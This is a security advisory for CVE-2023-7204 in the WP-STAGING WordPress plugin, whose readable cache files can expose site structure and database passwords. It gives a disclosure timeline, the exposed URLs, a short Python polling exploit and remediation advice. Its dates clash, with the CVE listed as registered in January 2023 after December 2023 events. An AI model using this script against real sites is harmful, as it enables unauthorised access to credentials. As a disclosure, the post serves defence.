CVE-2023-7204 – WP-STAGING – Unauth Sensitive Data Exposure and Database password leak – POC/Exploit

In a recent examination of the WP-STAGING plugin, a highly critical vulnerability was uncovered, posing an existential threat to the security of WordPress installations. This flaw resides in the directory /wordpress/wp-content/uploads/wp-staging/ and exposes not only intricate details about the site’s architecture, configurations, and file structures but, more alarmingly, leaks the database password in certain instances. This revelation marks a significant security breach with far-reaching consequences.

Main info:

CVE	CVE-2023-7204
Plugin	WP STAGING WordPress Backup Plugin – Migration Backup Restore < 3.2.0
Critical	Super High
All Time	2 868 943
Active installations	80 000+
Publicly Published	January 8, 2023
Last Updated	January 8, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A3: Sensitive Data Exposure
PoC	Yes
Exploit	Yes
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7204 https://wpscan.com/vulnerability/65a8cf83-d6cc-4d4c-a482-288a83a69879/
Plugin Security Certification by CleanTalk

Timeline

December 18, 2023	Plugin testing and vulnerability detection in the WP-STAGING have been completed
December 18, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
December 25, 2023	The author fixed the vulnerability and released the plugin update
January 8, 2023	Registered CVE-2023-7204

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-staging/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database password (in some cases). Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding of Sensitive Data Exposure attack’s

Sensitive Data Exposure involves the unintentional disclosure of confidential information. In the case of WordPress, this could encompass database credentials, configuration files, or other critical data. Real-world examples of such exposure might include inadvertently revealing database passwords, allowing unauthorized users to access sensitive backend information.

Exploiting the Sensitive Data Exposure Vulnerability

Exploiting this vulnerability involves unauthorized users gaining access to sensitive information, particularly database passwords. Armed with this data, attackers can launch various attacks, including brute force attempts on password hashes, potentially leading to a full compromise of the system.

POC:

1) The plugin has the ability staging of site. When some admin will start this process attacker can capture .cache file 

2) There is a lot of sensitive data (paths (another backups included), DB_name, DB_tables, DB_columns and etc) and most importantly, you can take database password if user use PRO version of the plugin and migrate him site to another database

“http://your_site/wordpress/wp-content/uploads/wp-staging/clone_options.cache”,

“http://your_site/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache”

EXPLOIT (python3):

import requests
import time
import threading


urls = [
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/clone_options.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache"
]


print("The following links are checked:")
for url in urls:
    print(url)


def check_url(url):
    while True:
        try:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")

        time.sleep(1)


for url in urls:
    thread = threading.Thread(target=check_url, args=(url,))
    thread.start()

___

The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:

• Initiate brute force attacks on leaked database passwords.
• Gain unauthorized access to sensitive configurations.
• Compromise the integrity and confidentiality of the entire WordPress system.

This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.

Recommendations for Improved Security

• Immediate Patching: Developers should release an urgent patch or update that addresses this specific vulnerability.
• Password Rotation: Database passwords should be promptly rotated to nullify the leaked credentials.
• Monitoring and Logging: Implement robust monitoring and logging mechanisms to detect and respond to suspicious activities.
• Educate and Alert Users: Inform WordPress administrators and users about the urgency of the situation and the need to update the plugin immediately.
• Third-Party Security Audits: Consider third-party security audits to identify and rectify any other potential vulnerabilities in the WordPress setup.

By adopting these measures, WordPress administrators can mitigate the immediate risks and fortify their systems against potential exploitation, ensuring the security and confidentiality of their sensitive data.

#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.